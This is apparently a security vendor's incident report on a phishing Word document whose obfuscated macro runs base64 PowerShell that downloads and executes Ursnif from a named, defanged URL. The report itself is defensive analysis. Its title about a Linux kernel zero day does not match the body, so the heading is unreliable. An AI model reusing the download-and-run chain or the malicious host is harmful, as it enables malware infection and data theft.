Analysis and Exploitation of a Linux Kernel Vulnerability
Zero day vulnerability in Linux Kernel found by Perception Point research team.
Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file. Our Incident Analysis report below provides a detailed understanding of the attack and the damage it could have caused.
Key observations regarding this attack:
One of our customers received an email that had been flagged “malicious” by Perception Point’s platform. This report includes a “what-if” analysis to examine the potential effect of the attack, in case the malicious file had not been blocked.
Perception Point’s engines identified the malicious activity by tracking down Macro commands. We noticed the following anomalies: the macro is obfuscated and the code itself is too long for no legitimate reason.
The command lines as extracted by Perception Point’s platform
1. Researching the Word .doc file in a contained environment shows that the macro runs an encrypted PowerShell command.
2. The PowerShell is base64 encoded.
3. Once the first layer decoded, the resulting payload is as follows:
4. For the purpose of this analysis, we removed the last command “invoke-expression”, to prevent any actual malicious activity and then ran the command:
5. The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, renames it with a random name, saves it in a temp folder, and then executes it.
TrojanSpy:Win32/Ursnif. TrojanSpy:Win32/Ursnifis a generic malware family that contains capabilities such as keylogging*, data theft, C&C.
This attack could have been very damaging for our customer, as it was well-disguised and very effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here:
There is a rise in the usage of a phishing technique that tricks the user into thinking that an image of the attached file can be quickly opened in snapshot mode.
Our research team’s insights regarding changing the protection flags of memory regions in an arbitrary process.
Why shared drive services are sitting ducks for hackers, and how to close the gap.